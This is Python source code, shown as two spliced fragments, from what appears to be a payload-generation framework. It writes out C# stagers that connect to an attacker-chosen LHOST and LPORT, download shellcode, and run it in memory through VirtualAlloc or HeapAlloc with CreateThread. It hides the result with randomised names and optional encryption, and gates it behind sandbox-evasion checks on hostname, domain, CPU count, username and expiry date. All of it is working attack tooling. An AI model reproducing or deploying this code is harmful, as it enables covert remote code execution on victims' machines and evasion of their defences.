IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) sName = helpers.randomString() curlyCount = 0 payload_code += "static void Main(){\n" payload_code2, curlyCount = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % ( sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += " %s(%s); }\n" % (injectName, sName) while (curlyCount != 0): payload_code += '\t' * curlyCount + '}' curlyCount -= 1 # get 12 random variables for the API imports r = [helpers.randomString() for x in range(12)] y = [helpers.randomString() for x in range(17)] if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): getDataName = helpers.randomString() injectName = helpers.randomString() payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % ( helpers.randomString(), helpers.randomString()) hostName = helpers.randomString() portName = helpers.randomString() ipName = helpers.randomString() sockName = helpers.randomString() length_rawName = helpers.randomString() lengthName = helpers.randomString() sName = helpers.randomString() total_bytesName = helpers.randomString() handleName = helpers.randomString() payload_code += "static byte[] %s(string %s, int %s) {\n" % ( getDataName, hostName, portName) payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % ( ipName, hostName, portName) payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % ( sockName) payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName) payload_code += " catch { return null;}\n" payload_code += " byte[] %s = new byte[4];\n" % (length_rawName) payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName) payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % ( lengthName, length_rawName) payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName) payload_code += " int %s = 0;\n" % (total_bytesName) payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName) payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % ( total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName) payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % ( handleName, sockName) payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % ( handleName, sName, sName) payload_code += " return %s;}\n" % (sName) sName = helpers.randomString() funcAddrName = helpers.randomString() hThreadName = helpers.randomString() threadIdName = helpers.randomString() pinfoName = helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) sName = helpers.randomString() randomName = helpers.randomString() curlyCount = 0 payload_code += "static void Main(){\n" if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = helpers.randomString() RandExpire = helpers.randomString() # Create Payload code payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format( RandToday) payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0]) payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check curlyCount += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( self.required_options["HOSTNAME"][0].lower()) # Add a tab for this check curlyCount += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check curlyCount += 1 if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( self.required_options["PROCESSORS"][0]) # Add a tab for this check curlyCount += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = helpers.randomString() rand_char_name = helpers.randomString() payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, self.required_options["USERNAME"][0]) # Add a tab for this check curlyCount += 1 payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % ( sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += " %s(%s); }\n" % (injectName, sName) while (curlyCount != 0): payload_code += '\t' * curlyCount + '}' curlyCount -= 1 # get 12 random variables for the API imports r = [helpers.randomString() for x in range(12)] y = [helpers.randomString() for x in range(17)] if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return